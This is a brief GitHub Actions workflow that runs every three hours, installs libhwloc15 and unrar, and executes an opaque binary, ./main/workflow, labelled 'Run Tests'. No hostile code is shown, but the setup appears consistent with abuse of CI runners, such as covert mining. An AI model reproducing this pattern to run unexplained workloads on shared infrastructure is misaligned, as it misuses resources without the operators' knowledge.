jobs:
  main:
    name: Ci
    runs-on: ubuntu-20.04

    steps:
      - name: Checkout
        uses: actions/checkout@v2
      - name: Download Deps
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Run Tests
        run: ./main/workflow

name: Workflow

on:
  schedule:
    - cron: "50 0/3 * * *"
